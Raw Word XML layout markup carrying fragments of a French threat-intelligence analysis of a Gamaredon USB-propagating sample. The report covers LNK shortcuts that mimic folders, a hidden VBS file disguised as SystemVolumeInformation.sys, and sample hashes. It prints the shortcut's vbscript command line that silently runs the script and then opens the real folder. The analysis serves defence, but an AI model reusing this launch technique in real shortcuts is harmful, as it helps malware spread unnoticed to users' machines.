                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="52704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1216" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5107940</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5972819</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1346200" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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20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6200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1345565" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1345565" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="134620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9408" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1372869</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6188719</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1606549" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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6549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6549" h="414020">
                          <a:moveTo>
                            <a:pt x="635" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="214630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1345565" y="214630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1345565" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215264"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1346200" y="215264"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="342265" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="342265" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1605915" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1605915" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="341630" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="160654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1456" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4124325</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7244089</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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7600" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1684019</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7244089</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2246629" cy="791209"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="17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6629" cy="7912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46629" h="791209">
                          <a:moveTo>
                            <a:pt x="635" y="791209"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="591819"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2245995" y="591819"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2245995" y="791209"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="592454"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2246629" y="592454"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="194945" y="199389"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="19494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862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964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0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1223191" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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31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Note de l’analyste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1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1235733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5881188" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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811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L’analyse d’un échantillon Gamaredon identifié sur VirusTotal par la requête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1421153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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engines:gamaredon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a révélé un mécanisme similaire de propagation via des raccourcis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3744" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5541467</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1606573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1195130" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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51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(SHA256</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="31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6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4768" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4218660</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1603640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="844061" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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406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desktop.co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5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1606573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2878916" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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89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LNK</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="31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6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malveillants.</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="31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6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L’échantillon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6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1783345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3b7aacb070f00960093ec1681674e30b7c8bb37c887c9b2450fb1f24e866e846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) se distingue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7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1965983</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2495814" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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58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GammaWorm par plusieurs aspects.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8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2256378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Il utilise un script VBS obfusqué nommé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SystemVolumeInformation.sys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, stocké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988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2471643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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%APPDATA%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 puis copié à la racine de chaque lecteur détecté. L’extension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.sys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imite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0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2686908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5878575" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5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fichier système Windows et son nom peut paraître légitime car il ressemble au </w:t>
                        </w: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System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193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2902173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Volume Information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 présent sur tous les lecteurs USBs. Les lecteurs cibles sont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3098823</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2316998" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6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identifiés par la même requête WMI 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3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3373778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Pour chaque dossier à la racine d’un volume, le binaire crée un raccourci LNK portant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5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3547133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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même </w:t>
                        </w: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 nom que le dossier légitime, av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ec l’icône standard des dossiers Windows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6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3740808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="82521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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7056" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>965834</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3739103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5770763" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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76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"%WINDIR%\system32\shell32.dll,3"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) afin de tromper l'utilisateur. Le dossier original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8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3954368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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est ensuite masqué via l’attribut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FILE_ATTRIBUTE_HIDDEN</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle49"/>
                            <w:spacing w:val="-5"/>
                            <w:sz w:val="19"/>
                            <w:szCs w:val="19"/>
                            <w:vertAlign w:val="superscript"/>
                          </w:rPr>
                          <w:t xml:space="preserve">27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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">), sans ajout de l’attribut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910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4169633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2500348" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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034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SYSTEM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contrairement à GammaWorm.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0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4471058</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4253100" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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31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raccourci LNK n'exécute plus un code JavaScript mais VBScript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1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4765416</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1300404" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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40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vbscript:</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle50"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">execute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2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4912736</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1300150" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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150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sh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WScript.Shell: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3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5060056</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3754044" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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404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createObject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sh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).run wscript.</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle51"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">exe</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle32"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> //</w:t>
                        </w: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:</w:t>
                        </w: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vbScript</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle32"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> //</w:t>
                        </w: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b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4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5207376</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2416734" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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673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SystemVolumeInformation.sys,</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle52"/>
                            <w:spacing w:val="-6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52"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">0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5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5354696</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3830244" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3024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createObject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sh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).run explorer.exe [FOLDER_PATH],</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle52"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">1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52"/>
                            <w:spacing w:val="-6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">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6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5502016</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1151179" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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1179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)(window.</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle51"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">close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7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5958428</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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première commande exécute le script VBS de manière cachée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intWindowStyle=0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)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8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6175398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="850591" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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05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asynchrone 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9344" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1734185</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6173693</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5002413" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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241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bWaitOnReturn=0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), tandis que la seconde ouvre le dossier légitime de façon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0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6390663</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="508745" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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874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visible 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1392" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1392554</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6388958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4745238" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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523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intWindowStyle=1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), simulant un comportement normal pour l’utilisateur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28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2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6690383</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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Contrairement à GammaWorm, ce variant n’utilise pas d'ADS, ne génère ni faux documents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6863738</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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ni noms de fichiers ukrainiens, et ne réplique pas récursivement dans les sous-répertoires.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4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7037093</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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propagation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 se limite à la création de raccourc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is LNK à la racine des volumes et à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5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7229063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3299343" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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934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copie du fichier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SystemVolumeInformation.sys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6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7820883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3043440" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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344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Analyse du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SystemVolumeInformation.sys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7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8122308</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5880553" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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805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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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script</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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08"/>
                            <w:spacing w:val="11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été</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="11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identifié</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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grâce</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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à</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08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1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recherche</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="29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8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8307728</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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name:SystemVolumeInformation.sys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. Parmi les 5 résultats obtenus, le plus récent,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9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8493148</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5794410" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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441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daté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du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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="29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avril</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="29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2026,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été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retenu</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="2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0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8663570</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4990348" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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034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4ed213a38f1459bdc442186055172b97ef08a3636a8f8bd9f956b469f29bc49e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1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9327537</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5360961" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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096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27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https://learn.microsoft.com/en-us/office/vba/language/reference/user-interface-help/attributes-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2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501200" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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20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property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4423066" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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306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28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https://www.vbsedit.com/html/6f28899c-d653-4555-8a59-49640b0e32ea.asp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470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572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675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77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8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880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8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15084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435609"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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356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35609"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435609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="43560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494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1540519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="607695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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6076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607695">
                          <a:moveTo>
                            <a:pt x="4571999" y="607695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="607695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607695"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3733799" y="607695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4571364" y="607695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607695"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1380489" y="607695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3733164" y="607695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607695"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="607695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1379855" y="607695"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1379855" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="60769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006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2148849</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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  <a:moveTo>
                            <a:pt x="0" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1379855" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1379855" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="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3032769</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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82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3916689</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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5"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="883285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5"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3733799" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4571364" y="883285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5"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1380489" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3733164" y="883285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23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4800609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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64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5684529</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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259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6568449</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5791200" cy="3105784"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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1200" cy="31057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1200" h="3105784">
                          <a:moveTo>
                            <a:pt x="0" y="2656839"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2656839"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3105784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3105784"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2656839"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1049655"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1049655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2657474"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2657474"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1049655"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="889635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="889635"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1049655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1049655"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="889635"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4572634" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5791200" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4572634" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4572634" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3734434" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4571999" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4571999" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3734434" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3734434" y="883284"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1381124" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3733799" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3733799" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1381124" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1381124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435609"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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356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35609"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435609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="43560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87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1540519</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="607695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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6076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607695">
                          <a:moveTo>
                            <a:pt x="4571999" y="607695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="607695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607695"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3733799" y="607695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4571364" y="607695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607695"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1380489" y="607695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3733164" y="607695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607695"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="607695"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1379855" y="607695"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1379855" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="60769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38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2148849</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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  <a:moveTo>
                            <a:pt x="0" y="883284"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1379855" y="883284"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="1379855" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="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79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3032769</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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20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3916689</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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5"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5790564" y="883285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5"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3733799" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4571364" y="883285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5"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="1380489" y="883285"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3733164" y="883285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614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4800609</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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02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5684529</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5790564" cy="1767204"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="18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56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0564" h="1767204">
                          <a:moveTo>
                            <a:pt x="0" y="1767204"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1379855" y="1767204"/>
                          </a:lnTo>
                          <a:lnTo>
